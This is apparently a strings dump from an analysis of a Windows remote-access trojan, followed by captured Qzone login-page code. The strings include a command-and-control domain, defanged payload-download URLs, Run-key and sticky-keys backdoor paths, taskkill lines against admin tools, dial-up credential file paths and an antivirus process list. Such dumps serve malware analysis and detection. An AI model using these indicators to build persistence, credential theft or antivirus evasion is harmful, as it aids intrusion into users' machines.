BcURlIB69hyFN7hYNmGysFYX3L0S6NMd3GYB1H8YTyhsOn24CaWTyZRx Nje4bdm1VpLMo94X3tKtShUB6rztFJVTCr46WR sL83/MrpMN/iLykL8rmehO54UJ SS/zGK1flwMdZAOigz5zxYHaIypxZF4MHgf0PgHdKNLLO3Cx/8VG7UKlMyR6AFXDtJa29lV6D9lYwlzrBC0vnBNswaDTy08rJXOP/Bw0qi1n 0PkQVqErH M5SkXfx/7smTRn39769hYKEW3LbKZEca/FRPfj8Bmkzul43H60Xw5RY5EQa4jeaWcgzHlT2JSkPMprWVhSL4zEFe/j5Vga9AWLrL5aCNIjJdyanpzfrlvRu2KOFY4tGwQlwJ T4XAz7yn7PFjQGa6vfl/AlMCchhpuo9494uT4b pbtPKguWvYwKANhoot0/YDZxQ6jM9ZC618MpC1lFOu8BeayfAbidwOPywOxSUdy2gszCz6eTP dPgUP8QoTKGLjvHjCunxlxmvx48QnsK2tASuIV56egB8pkPAkdamot5Mz8MT5M=
%Program Files%\Mysqld\
Mysqld/1.0
WININET.dll
ch2=%d
ch1=%d
%Program Files%\Mysqld\NetSyst96.PNG
Allows TeamViewer to be run from a removable drive. For additional details, visit hXXp://portableappz.blogspot.com
PortableAppZ.blogspot.com
TeamViewer Portable
0.0.0.0
PortableAppZ is a Trademark of Bernat
TeamViewerPortable.exe
Iphgbnc.exe_4092_rwx_10001000_00348000:
D$%SS
t;Jt%UQJPSt
@43434343
Jw2.Hw
deflate 1.1.4 Copyright 1995-2002 Jean-loup Gailly
inflate 1.1.4 Copyright 1995-2002 Mark Adler
This software is derived from the GNU GPL XviD codec (1.3.0).
Software\Microsoft\Windows\CurrentVersion\run
\StringFileInfo\%s\CompanyName
000%x
Software\Microsoft\Windows\CurrentVersion\Run
%d * %d:
(%d-d-d d:d:d)
<%s> %s
%d.%d.%d.%d
Ourlog
%s\*.*
%s%s%s
%s%s*.*
%Y-%m-%d %H:%M
%s : %u
InternalGetUdpTableWithOwnerPid
AllocateAndGetUdpExTableFromStack
InternalGetTcpTable2
AllocateAndGetTcpExTableFromStack
%d-%d-%d %d:%d:%d
hXXp://
\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat
\Local Settings\History\History.IE5\index.dat
%Y-%m-%d %H:%M:%S
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
\*.url
%sDocuments and Settings\%s\Favorites
%sUsers\%s\Favorites
192.168.1.2
GET %s HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)
Host: %s:%d
Host: %s
User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0
Referer: hXXp://%s:80/hXXp://%s
:] %s
:] %d-%d-%d %d:%d:%d
%s\dllcache\magnify.exe
%s\dllcache\osk.exe
%s\dllcache\sethc.exe
%s\magnify.exe
%s\osk.exe
%s\sethc.exe
\dllcache\termsrvhack.dll
\termsrvhack.dll
%SystemRoot%\system32\termsrvhack.dll
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
TSDISCON %s
LOGOFF %s
taskkill /f /im cmd.exe
cmd.exe
taskkill /f /im taskmgr.exe
taskmgr.exe
taskkill /f /im regedit.exe
regedit.exe
taskkill /f /im mmc.exe
mmc.exe
taskkill /f /im mstsc.exe
mstsc.exe
taskkill /f /im QQ.exe
QQ.exe
taskkill /f /im Maxthon.exe
Maxthon.exe
taskkill /f /im Firefox.exe
Firefox.exe
taskkill /f /im Chrome.exe
Chrome.exe
taskkill /f /im sogouexplorer.exe
sogouexplorer.exe
taskkill /f /im 360SE.exe
360SE.exe
taskkill /f /im IEXPLORE.exe
IEXPLORE.exe
taskkill /f /im s.exe
s.exe
PortNumber
%d/%d
\cmd.exe
explorer.exe
All Users\Microsoft\Network\Connections\Pbk\rasphone.pbk
Microsoft\Network\Connections\pbk\rasphone.pbk
Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk
AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\rasphone.pbk
%s\%s
AppData\Roaming\Microsoft\Network\Connections\pbk\rasphone.pbk
%USERPROFILE%
RasDialParams!%s#0
Iphlpapi.dll
rasphone.pbk
\Application Data\Tencent\Users\*.*
\AppData\Roaming\Tencent\Users\*.*
/IP (%s)
Net123.dat
mgui.exe
mcagent.exe
Pavsrv50.exe
SHesvchost.exe
onlinent.exe
pasvc.exe
fsaa.exe
vba32ldr.exe
spider.exe
ccapp.exe
bdnagent.exe
MsMpEng.exe
v3lsvc.exe
AYAgent.aye
avgui.exe
baidusdSvc.exe
QQPCRTP.exe
ksafe.exe
rtvscan.exe
ashDisp.exe
avcenter.exe
pccmain.exe
knsdtray.exe
kxetray.exe
egui.exe
Mcshield.exe
RavMonD.exe
KvMonXP.exe
avp.exe
360sd.exe
360tray.exe
%d %c %d
1.1.4
xvid-1.3.2
%d st:%lld if:%d
XviDd%c
%Program Files%\Microsoft Iphgbn
12345678
qingxiaofeng.f3322.org
%Program Files%\Microsoft Iphgbn\Iphgbnc.exe
hXXp://users.qzone.qq.com/fcg-bin/cgi_get_portrait.fcg?uins=%s
hXXp://VVV.ip138.com/ips138.asp?ip=%s&action=2
hXXp://dns.aizhan.com/?q=%s
Iphgbnc.exe
hXXp://180.97.221.181:8980/x.exe
~~}}}~~}}}
PeekNamedPipe
DisconnectNamedPipe
CreatePipe
WinExec
GetProcessHeap
GetWindowsDirectoryA
RegCreateKeyA
RegQueryInfoKeyA
RegCreateKeyExA
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyA
RegOpenKeyExA
RegCloseKey
ShellExecuteA
MapVirtualKeyA
keybd_event
UnhookWindowsHookEx
SetWindowsHookExA
GetKeyState
ExitWindowsEx
EnumWindows
InternetOpenUrlA
.text
`.rodata
`.rotext
`.rdata
@.data
.rsrc
@.reloc
""""$$$$&&&&((((****,,,,....00002222444466668888::::<<<<>>>>
#*1892 $
%,3:;4-&
'.5<=6/7>?
"#()01* $%&',-./2389:;4567<=>?
"*2:# 3;
$,4<%-5=
&.6>'/7?
iphlpapi.dll
lIngress.exe
arpguard.exe
zrclient.exe
zrupdate.exe
zreboot.exe
This user account is used by the Visual Studio .NET Debugger
ntdll.dll
Iphgbnc.exe_140:
.text
`.rdata
@.data
.rsrc
SSSSh
MFC42.DLL
MSVCRT.dll
_acmdln
GetProcessHeap
KERNEL32.dll
USER32.dll
Misql.exe
hXXp://180.97.221.181:64430/NetSyst96.dll
BcURlIB69hyFN7hYNmGysFYX3L0S6NMd3GYB1H8YTyhsOn24CaWTyZRx Nje4bdm1VpLMo94X3tKtShUB6rztFJVTCr46WR sL83/MrpMN/iLykL8rmehO54UJ SS/zGK1flwMdZAOigz5zxYHaIypxZF4MHgf0PgHdKNLLO3Cx/8VG7UKlMyR6AFXDtJa29lV6D9lYwlzrBC0vnBNswaDTy08rJXOP/Bw0qi1n 0PkQVqErH M5SkXfx/7smTRn39769hYKEW3LbKZEca/FRPfj8Bmkzul43H60Xw5RY5EQa4jeaWcgzHlT2JSkPMprWVhSL4zEFe/j5Vga9AWLrL5aCNIjJdyanpzfrlvRu2KOFY4tGwQlwJ T4XAz7yn7PFjQGa6vfl/AlMCchhpuo9494uT4b pbtPKguWvYwKANhoot0/YDZxQ6jM9ZC618MpC1lFOu8BeayfAbidwOPywOxSUdy2gszCz6eTP dPgUP8QoTKGLjvHjCunxlxmvx48QnsK2tASuIV56egB8pkPAkdamot5Mz8MT5M=
%Program Files%\Mysqld\
Mysqld/1.0
WININET.dll
ch2=%d
ch1=%d
%Program Files%\Mysqld\NetSyst96.PNG
Allows TeamViewer to be run from a removable drive. For additional details, visit hXXp://portableappz.blogspot.com
PortableAppZ.blogspot.com
TeamViewer Portable
0.0.0.0
PortableAppZ is a Trademark of Bernat
TeamViewerPortable.exe
Iphgbnc.exe_140_rwx_10001000_00348000:
D$%SS
t;Jt%UQJPSt
@43434343
Jw2.Hw
deflate 1.1.4 Copyright 1995-2002 Jean-loup Gailly
inflate 1.1.4 Copyright 1995-2002 Mark Adler
This software is derived from the GNU GPL XviD codec (1.3.0).
Software\Microsoft\Windows\CurrentVersion\run
\StringFileInfo\%s\CompanyName
000%x
Software\Microsoft\Windows\CurrentVersion\Run
%d * %d:
(%d-d-d d:d:d)
<%s> %s
%d.%d.%d.%d
Ourlog
%s\*.*
%s%s%s
%s%s*.*
%Y-%m-%d %H:%M
%s : %u
InternalGetUdpTableWithOwnerPid
AllocateAndGetUdpExTableFromStack
InternalGetTcpTable2
AllocateAndGetTcpExTableFromStack
%d-%d-%d %d:%d:%d
hXXp://
\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat
\Local Settings\History\History.IE5\index.dat
%Y-%m-%d %H:%M:%S
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
\*.url
%sDocuments and Settings\%s\Favorites
%sUsers\%s\Favorites
192.168.1.2
GET %s HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)
Host: %s:%d
Host: %s
User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0
Referer: hXXp://%s:80/hXXp://%s
:] %s
:] %d-%d-%d %d:%d:%d
%s\dllcache\magnify.exe
%s\dllcache\osk.exe
%s\dllcache\sethc.exe
%s\magnify.exe
%s\osk.exe
%s\sethc.exe
\dllcache\termsrvhack.dll
\termsrvhack.dll
%SystemRoot%\system32\termsrvhack.dll
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
TSDISCON %s
LOGOFF %s
taskkill /f /im cmd.exe
cmd.exe
taskkill /f /im taskmgr.exe
taskmgr.exe
taskkill /f /im regedit.exe
regedit.exe
taskkill /f /im mmc.exe
mmc.exe
taskkill /f /im mstsc.exe
mstsc.exe
taskkill /f /im QQ.exe
QQ.exe
taskkill /f /im Maxthon.exe
Maxthon.exe
taskkill /f /im Firefox.exe
Firefox.exe
taskkill /f /im Chrome.exe
Chrome.exe
taskkill /f /im sogouexplorer.exe
sogouexplorer.exe
taskkill /f /im 360SE.exe
360SE.exe
taskkill /f /im IEXPLORE.exe
IEXPLORE.exe
taskkill /f /im s.exe
s.exe
PortNumber
%d/%d
\cmd.exe
explorer.exe
All Users\Microsoft\Network\Connections\Pbk\rasphone.pbk
Microsoft\Network\Connections\pbk\rasphone.pbk
Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk
AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\rasphone.pbk
%s\%s
AppData\Roaming\Microsoft\Network\Connections\pbk\rasphone.pbk
%USERPROFILE%
RasDialParams!%s#0
Iphlpapi.dll
rasphone.pbk
\Application Data\Tencent\Users\*.*
\AppData\Roaming\Tencent\Users\*.*
/IP (%s)
Net123.dat
mgui.exe
mcagent.exe
Pavsrv50.exe
SHesvchost.exe
onlinent.exe
pasvc.exe
fsaa.exe
vba32ldr.exe
spider.exe
ccapp.exe
bdnagent.exe
MsMpEng.exe
v3lsvc.exe
AYAgent.aye
avgui.exe
baidusdSvc.exe
QQPCRTP.exe
ksafe.exe
rtvscan.exe
ashDisp.exe
avcenter.exe
pccmain.exe
knsdtray.exe
kxetray.exe
egui.exe
Mcshield.exe
RavMonD.exe
KvMonXP.exe
avp.exe
360sd.exe
360tray.exe
%d %c %d
1.1.4
xvid-1.3.2
%d st:%lld if:%d
XviDd%c
%Program Files%\Microsoft Iphgbn
12345678
qingxiaofeng.f3322.org
%Program Files%\Microsoft Iphgbn\Iphgbnc.exe
hXXp://users.qzone.qq.com/fcg-bin/cgi_get_portrait.fcg?uins=%s
hXXp://VVV.ip138.com/ips138.asp?ip=%s&action=2
hXXp://dns.aizhan.com/?q=%s
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="keywords" content="QQ??,qzone,??,??,??,??,??,??,??,??,qq??,qq??,????,????" />
<link rel="apple-touch-icon" href="hXXps://qzonestyle.gtimg.cn/qzone/v8/index/touch-icon-ipad-retina.png">
<link rel="apple-touch-icon" sizes="76x76" href="hXXps://qzonestyle.gtimg.cn/qzone/v8/index/touch-icon-ipad.png">
<link rel="apple-touch-icon" sizes="120x120" href="hXXps://qzonestyle.gtimg.cn/qzone/v8/index/touch-icon-iphone-retina.png">
<link rel="apple-touch-icon" sizes="152x152" href="hXXps://qzonestyle.gtimg.cn/qzone/v8/index/touch-icon-ipad-retina.png">
<link rel="icon" sizes="any" mask href="hXXps://qzonestyle.gtimg.cn/qzone/v8/img/Qzone.svg">
(function(){try{if(parent!=self && (parent.document.domain!=document.domain || (document.referrer && !/^http(s)?:\/\/[.\w-]+\.qq\.com\//i.test(document.referrer)))){throw new Error("can't be iframed");}}catch(e){debugger;window.open(location.href, "_top");}})();
????? ????URL??????
var getParameter = function(url, name){
m = url.match(r);
if(location.host == 'iamsinger.qzone.com'){
var getHttpParams = function(name, str){
var m = (str || location.href).match(r);
return decodeURIComponent(!m?"":m[2]).replace(/\+/g," ");
var g_sUA = navigator.userAgent.toLowerCase();
var android = g_sUA.match(/(android)\s+([\d.]+)/);
var ios = g_sUA.match(/(ipad|iphone|ipod).*os\s([\d_]+)/);
location.href = '//m.qzone.com/l?sid=' + getHttpParams('sid') + '&g_f=' + getHttpParams('g_f') + '&groupid=17&g=145';
location.href = '//rc.qzone.qq.com/myhome?action=auto_popup_checkin&checkin_groupid=17&checkin_source=song';
if(location.href.indexOf('qzone.qq.com/app') > -1){
location.href = "//my.qzone.qq.com/";
}else if(location.href.indexOf('qzone.com') > -1){
location.href = "//qzone.qq.com/";
var ua = navigator.userAgent,mat = ua.match(/(iPhone|iPod|android|symbian)/i);
location.replace('//m.qzone.com/');
document.domain = "qq.com";
var r = new RegExp("(?:^|; |\\s+)" + n + "=([^;]*)"),m = document.cookie.match(r);
expire.setTime(expire.getTime() + 3600000 * hour);
document.cookie = name + "=" + value + "; " + (hour?("expires=" + expire.toGMTString() + "; "):"") + (path?("path=" + path + "; "):"path=/; ") + (domain?("domain=" + domain + ";"):("domain=qq.com;"));
return obj === null?'null':(obj === undefined?'undefined':Object.prototype.toString.call(obj).slice(8,-1).toLowerCase());
var ref = document.referrer || location.href;
if(ref.indexOf("://") < 1){
ref = location.protocol + "//" + location.host + (ref.indexOf("/") == 0?"":location.pathname.substr(0,location.pathname.lastIndexOf("/") + 1)) + ref;
var depart = ref.split("://");
if(getType(depart) == "array" && depart.length > 1 && (/^[a-zA-Z]+$/).test(depart[0])){
var h = depart[1].split("/");
setCookie('_qz_referrer',h[0],'qq.com',"/",0.1);
var _su,suin,checklogin_r = /\D/g;
suin = (_su = getCookie('uin').replace(checklogin_r,'') - 0) && getCookie('p_skey') && _su > 10000 && _su || 0;
var qq = getParameter(location.href, 'qzoneInIframe'),
url = '//user.qzone.qq.com/' + suin;
url = url + '?qzoneInIframe=' + qq;
location.href = url;
var jumpurl = window.location.protocol + '//qzs.qzone.qq.com/qzone/v5/loginsucc.html?para=izone',p_smallPic = '',p_smallUrl = '',p_bgPics = [],p_bgPic = [];
return document.getElementById(id);
function ptlogin2_onResize(width,height){
login_wnd = document.getElementById("login_div");
if(login_wnd){
login_wnd.style.width = width + "px";
login_wnd.style.height = height + "px";
login_wnd.style.visibility = "hidden"
login_wnd.style.visibility = "visible"
if (typeof window.postMessage !== 'undefined') {
window.onmessage = function(event) {
var msg = event || window.event;
data = JSON.parse(msg.data);
data = str2JSON(msg.data);
switch (data.action) {
ptlogin2_onClose && ptlogin2_onClose();
ptlogin2_onResize(data.width, data.height);
<link href="//qzonestyle.gtimg.cn/qzone_v6/proj_qzonelogin/qzonelogin.css?20130306" rel="stylesheet" media="screen" />
<link rel="Shortcut Icon" href="//qzonestyle.gtimg.cn/aoi/img/logo/favicon.ico?max_age=31536000" type="image/x-icon"/>
<div class="login_head">
<div class="login_img">
<a id="small_url" href="//i.qq.com/" tabindex="-1" onclick="TCISD.pv('ihome.qzone.qq.com','advertise');"></a>
<div class="login_wrap" id="login_div" style="height:316px;box-shadow:none;background:transparent">
<!--<iframe id="login_frame" height="100%" scrolling="auto" width="100%" frameborder="0" src="//ui.ptlogin2.qq.com/cgi-bin/login?daid=5&pt_qzone_sig=1&hide_title_bar=1&low_login=0&qlogin_auto_login=1&no_verifyimg=1&link_target=blank&appid=549000912&style=12&target=self&s_url=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&pt_qr_app=ÊÖ»úQQ¿Õ¼ä&pt_qr_link=http://z.qzone.com/download.html&self_regurl=http://qzs.qq.com/qzone/v6/reg/index.html&pt_qr_help_link=http://z.qzone.com/download.html"></iframe>-->
var url = location.search,
key = '',
if(url) {
url = url.substr(1);
queryArr =url.split('&');
for(var i = 0, len = queryArr.length; i < len; i++) {
kvArr = queryArr[i].split('=');
if(kvArr.length >= 2) {
key = kvArr[0];
if('s_url' == key) {
if(value.search(/^https?:\/\/(.*)\.qzone\.qq\.com\//) == -1 && value.search(/^https?:\/\/(.*)\.qzone\.com\//) == -1 && value.search(/^https?:\/\/gameapp\.qq\.com\//) == -1 && value.search(/^https?:\/\/nextradio\.qq\.com\//) == -1) {//????,???qzone.qq.com?qzone.com??
value = encodeURIComponent('hXXps://qzs.qzone.qq.com/qzone/v5/loginsucc.html?para=izone');
value = encodeURIComponent('hXXps://qzs.qzone.qq.com/qzone/v5/loginsucc.html?para=izone&specifyurl=' + encodeURIComponent(value));
var pt_no_auth = location.href.indexOf('?fl=1')>-1 ? 1 : 0;
var src = 'hXXps://xui.ptlogin2.qq.com/cgi-bin/xlogin?proxy_url=' + encodeURIComponent('https:') + '//qzs.qq.com/qzone/v6/portal/proxy.html&daid=5&&hide_title_bar=1&low_login=0&qlogin_auto_login=1&no_verifyimg=1&link_target=blank&appid=549000912&style=22&target=self&s_url=' + value + '&pt_qr_app=??QQ??&pt_qr_link=http://z.qzone.com/download.html&self_regurl=' + encodeURIComponent('https:') + '//qzs.qq.com/qzone/v6/reg/index.html&pt_qr_help_link=http://z.qzone.com/download.html&pt_no_auth=' + pt_no_auth;
document.write('<iframe id="login_frame" name="login_frame" height="100%" scrolling="no" width="100%" frameborder="0" src="' + src + '"></iframe>');
<div class="login_device">
<li><a href="hXXp://z.qzone.com/download.html" onclick="TCISD.pv('ihome.qzone.qq.com','bottom.iphone');" target="_blank"><i class="ui_icon icon_iphone"></i><span>iPhone</span></a></li>
<li><a href="hXXp://z.qzone.com/download.html" onclick="TCISD.pv('ihome.qzone.qq.com','bottom.ipad');" target="_blank"><i class="ui_icon icon_ipad"></i><span>iPad</span></a></li>
<li><a href="hXXp://z.qzone.com/download.html" onclick="TCISD.pv('ihome.qzone.qq.com','bottome.qzone.qq.com','bottom.android');" target="_blank"><i class="ui_icon icon_android"></i><span>Android</span></a></li>
<li><a href="hXXp://z.qzone.com/download.html" onclick="TCISD.pv('ihome.qzone.qq.com','bottom.windowsphone');" target="_blank"><i class="ui_icon icon_windowsphone"></i><span>Windows Phone</span></a></li>
<li><a href="hXXp://z.qzone.com/download.html" onclick="TCISD.pv('ihome.qzone.qq.com','bottom.otherphone');" target="_blank"><i class="ui_icon icon_other"></i><span>????</span></a></li>
<a href="hXXp://support.qq.com/discuss/46_1.shtml" target="_blank" onclick="TCISD.pv('ihome.qzone.qq.com','bottom.suggestion');">????</a> |
<a href="//qzone.qzone.qq.com/" onclick="TCISD.pv('ihome.qzone.qq.com','bottom.officialqzone');" target="_blank">????</a> |
<a href="//act.qzone.qq.com/" onclick="TCISD.pv('ihome.qzone.qq.com','bottom.actqzone');" target="_blank">????</a> |
<a href="//my.qzone.qq.com/" onclick="TCISD.pv('ihome.qzone.qq.com','bottom.app');" target="_blank">????</a> |
<a href="//user.qzonser.qzone.qq.com/949589999/main" onclick="TCISD.pv('ihome.qzone.qq.com','bottom.original');" target="_blank">?????</a> |
<a href="hXXp://connect.qq.com/" onclick="TCISD.pv('ihome.qzone.qq.com','bottom.connect');" target="_blank">QQ??</a> |
<a href="hXXp://connect.qq.com/intro/login/" onclick="TCISD.pv('ihome.qzone.qq.com','bottom.qqlogin');" target="_blank">QQ??</a> |
<a href="hXXp://connect.qq.com/intro/share/" onclick="TCISD.pv('ihome.qzone.qq.com','bottom.socialpackage');" target="_blank">????</a> |
<a href="hXXp://wiki.open.qq.com/wiki/投诉指引" onclick="TCISD.pv('ihome.qzone.qq.com','bottom.complaint');" target="_blank">??????</a> |
<a href="hXXp://wiki.open.qq.com/wiki/Tencent_Open_Platform_Complaint_Guidelines" onclick="TCISD.pv('ihome.qzone.qq.com','bottom.complaint_guildlines');" target="_blank">Complaint Guidelines</a>
</p> <p class="copyright_en">Copyright © 2005 - 2017 Tencent.<a target="_blank" href="hXXp://VVV.tencent.com/en-us/le/copyrightstatement.shtml">All Rights Reserved.</a></p>
<p class="copyright_cn">???? <a href="hXXp://VVV.tencent.com/law/mo_law.shtml?/law/copyright.htm" target="_blank">????</a> <a href="hXXp://VVV.qq.com/culture.shtml" target="_blank">???[2014]0633-233?</a></p>
<script type="text/javascript" src="//tajs.qq.com/stats?sId=52955029" charset="UTF-8"></script>
styleList = params.list || [];
<script type="text/javascript" src="//qzonestyle.gtimg.cn/qzone/qzactStatics/configSystem/data/179/config1.js"></script>
if(styleList.length === 0){
styleList.push({
bg : "//qzs.qq.com/qzone/v6/v6_config/upload/upfile_1759896_1352170422.jpg",
bg : "//qzs.qq.com/qzone/v6/v6_config/upload/upfile_1998047_1352170438.jpg"
bg : "//qzs.qq.com/qzone/v6/v6_config/upload/upfile_2040396_1352170450.jpg"
var randomData = Math.floor(Math.random() * styleList.length);
window.QZFL = window.QZFL || {};
QZFL.pingSender = function(url,t,opts){
var _s = QZFL.pingSender,iid,img;
if(!url){
img.iid = iid;
img.onload = img.onerror = img.ontimeout = (function(t){
evt = evt || window.event || {type:'timeout'};
void(typeof(opts[evt.type]) == 'function'?setTimeout((function(et,ti){
opts[et]({'type':et,'duration':((new Date()).getTime() - ti)});
})(evt.type,t._s_),0):0);
QZFL.pingSender._clearFn(evt,t);
(typeof(opts.timeout) == 'function') && setTimeout(function(){
img.ontimeout && img.ontimeout({type:'timeout'});
},(typeof(opts.timeoutValue) == 'number'?Math.max(100,opts.timeoutValue):5000));
img._s_ = (new Date()).getTime();
img.src = url;
},(t = Math.max(0,t))):(img.src = url));
QZFL.pingSender._sndPool = {};
QZFL.pingSender._sndCount = 0;
QZFL.pingSender._clearFn = function(evt,ref){
var _s = QZFL.pingSender;
_s._sndPool[ref.iid] = ref.onload = ref.onerror = ref.ontimeout = ref._s_ = null;
delete _s._sndPool[ref.iid];
if(typeof(window.TCISD) == "undefined"){
window.TCISD = {};
TCISD.pv = function(sDomain,path,opts){
TCISD.pv.send(sDomain,path,opts);
var pvSender = {send:function(domain,url,rDomain,rUrl){
items.push({dm:domain,url:url,rdm:rDomain || "",rurl:rUrl || ""});
timer = setTimeout(pvSender.doSend,5000);
if(items.length){
var url;
for(var i = 0;i < items.length;i++){
url = pvSender.getUrl(items.slice(0,items.length - i));
if(url.length < 2000){
items = items.slice(Math.max(items.length - i,1));
timer = setTimeout(pvSender.doSend,5000);
QZFL.pingSender(url);
},getUrl:function(list){
var data = {dm:escape(item.dm),url:escape(item.url),rdm:escape(item.rdm),rurl:escape(item.rurl),pgv_pvid:pvSender.getId(),sds:Math.random()};
for(var i = 1;i < list.length;i++){
ext.push([escape(p.dm),escape(p.url),escape(p.rdm),escape(p.rurl)].join(":"));
if(ext.length){
data.ex_dm = ext.join(";")
param.push(p + "=" + data[p]);
var url = [TCISD.pv.config.webServerInterfaceURL,"?cc=-&ct=-&java=1&lang=-&pf=-&scl=-&scr=-&tt=-&tz=-8&vs=3.3&flash=&",param.join("&")].join("");
return url;
t = document.cookie.match(TCISD.pv._cookieP);
if(t && t.length && t.length > 1){
d = (Math.round(Math.random() * 2147483647) * (new Date().getUTCMilliseconds())) % 10000000000;
document.cookie = "pgv_pvid=" + d + "; path=/; domain=qq.com; expires=Sun, 18 Jan 2038 00:00:00 GMT;";
h = document.cookie.match(TCISD.pv._cookieSSID);
f = (Math.round(Math.random() * 2147483647) * (new Date().getUTCMilliseconds())) % 10000000000;
document.cookie = "pgv_info=ssid=s" + f + "; path=/; domain=qq.com;";
TCISD.pv.send = function(sDomain,path,opts){
sDomain = sDomain || location.hostname || "-";
path = path || location.pathname;
opts.referURL = opts.referURL || document.referrer;
t = opts.referURL.split(TCISD.pv._urlSpliter);
t = t.split("/");
r = "/" + t.slice(3).join("/");
opts.referDomain = opts.referDomain || d;
opts.referPath = opts.referPath || r;
pvSender.send(sDomain,path,opts.referDomain,opts.referPath);
TCISD.pv._urlSpliter = /[\?\#]/;
TCISD.pv._cookieP = /(?:^|; |\s+)pgv_pvid=([^;]*)/i;
TCISD.pv._cookieSSID = /(?:^|; |\s+)pgv_info=([^;]*)/i;
TCISD.pv.config = {webServerInterfaceURL:"//pingfore.qq.com/pingd"};
window.TCISD = window.TCISD || {};
TCISD.createTimeStat = function(statName,flagArr,standardData){
var _s = TCISD.TimeStat,t,instance;
flagArr = flagArr || _s.config.defaultFlagArray;
t = flagArr.join("_");
TCISD.markTime = function(timeStampSeq,statName,flagArr,timeObj){
var ins = TCISD.createTimeStat(statName,flagArr);
ins.mark(timeStampSeq,timeObj);
TCISD.TimeStat = function(statName,flags,standardData){
var _s = TCISD.TimeStat;
this.sName = statName;
this.flagStr = flags;
this.timeStamps = [null];
this.zero = _s.config.zero;
this.standard = standardData;
TCISD.TimeStat.prototype.getData = function(seq){
if(seq && (t = this.timeStamps[seq])){
d.setTime(this.zero.getTime());
r.zero = d;
d.setTime(t.getTime());
r.time = d;
r.duration = t - this.zero;
if(this.standard && (d = this.standard.timeStamps[seq])){
r.delayRate = (r.duration - d) / d;
r.timeStamps = TCISD.TimeStat._cloneData(this.timeStamps);
TCISD.TimeStat._cloneData = function(obj){
var res = obj.sort?[]:{};
res[i] = TCISD.TimeStat._cloneData(obj[i]);
TCISD.TimeStat.prototype.mark = function(seq,timeObj){
seq = seq || this.timeStamps.length;
this.timeStamps[Math.min(Math.abs(seq),99)] = timeObj || (new Date());
TCISD.TimeStat.prototype.merge = function(baseTimeStat){
if(baseTimeStat && (typeof(baseTimeStat.timeStamps) == "object") && baseTimeStat.timeStamps.length){
this.timeStamps = baseTimeStat.timeStamps.concat(this.timeStamps.slice(1));
if(baseTimeStat.standard && (x = baseTimeStat.standard.timeStamps)){
if(!this.standard){
this.standard = {};
if(!(y = this.standard.timeStamps)){
y = this.standard.timeStamps = {};
for(var key in x){
if(!y[key]){
y[key] = x[key];
TCISD.TimeStat.prototype.setZero = function(od){
if(typeof(od) != "object" || typeof(od.getTime) != "function"){
this.zero this.zero = od;
TCISD.TimeStat.prototype.report = function(baseURL){
var _s = TCISD.TimeStat,url = [],t,z;
if((t = this.timeStamps).length < 1){
url.push((baseURL && baseURL.split("?")[0]) || _s.config.webServerInterfaceURL);
url.push("?");
z = this.zero;
for(var i = 1,len = t.length;i < len;++i){
url.push(i,"=",t[i].getTime?(t[i] - z):t[i],"&");
t = this.flagStr.split("_");
for(var i = 0,len = _s.config.maxFlagArrayLength;i < len;++i){
url.push("flag",i+1,"=",t[i],"&");
if(_s.pluginList && _s.pluginList.length){
for(var i = 0,len = _s.pluginList.length;i < len;++i){
(typeof(_s.pluginList[i]) == 'function') && _s.pluginList[i](url);
url.push("sds=",Math.random());
QZFL.pingSender && QZFL.pingSender(url.join(""));
TCISD.TimeStat._instances = {};
TCISD.TimeStat._count = 0;
TCISD.TimeStat.config = {webServerInterfaceURL:"//isdspeed.qq.com/cgi-bin/r.cgi",defaultFlagArray:[175,115,1],maxFlagArrayLength:6,zero:window._s_ || (new Date())};
TCISD.valueStat = function(statId,resultType,returnValue,opts){
TCISD.valueStat.send(statId,resultType,returnValue,opts);
TCISD.valueStat.send = function(statId,resultType,returnValue,opts){
var _s = TCISD.valueStat,_c = _s.config,t = _c.defaultParams,p,url = [];
statId = statId || t.statId;
resultType = resultType || t.resultType;
returnValue = returnValue || t.returnValue;
if(typeof(opts.reportRate) != "number"){
opts.reportRate = 1;
opts.reportRate = Math.round(Math.max(opts.reportRate,1));
if(!opts.fixReportRateOnly && !TCISD.valueStat.config.reportAll && (opts.reportRate > 1 && (Math.random() * opts.reportRate) > 1)){
url.push((opts.reportURL || _c.webServerInterfaceURL),"?");
url.push("flag1=",statId,"&","flag2=",resultType,"&","flag3=",returnValue,"&","1=",(TCISD.valueStat.config.reportAll?1:opts.reportRate),"&","2=",opts.duration,"&");
if(typeof opts.extendField != 'undefined'){
url.push("4=",opts.extendField,"&");
QZFL.pingSender(url.join(""));
TCISD.valueStat.config = {webServerInterfaceURL:"//isdspeed.qq.com/cgi-bin/v.cgi",defaultParams:{statId:1,resultType:1,returnValue:11,reportRate:1,duration:1000},reportAll:false};
TCISD.hotClick = TCISD.hotClick || function(tag,domain,url,opt){
TCISD.hotClick.send(tag,domain,url,opt);
TCISD.hotClick.send = function(tag,domain,url,opt){
var _s = TCISD.hotClick,x = opt.x || 9999,y = opt.y || 9999,doc = opt.doc || document,w = doc.parentWindow || doc.defaultView,p = w._hotClick_params || {};
url = url || p.url || w.location.pathname || "-";
domain = domain || p.domain || w.location.hostname || "-";
if(!_s.isReport()){
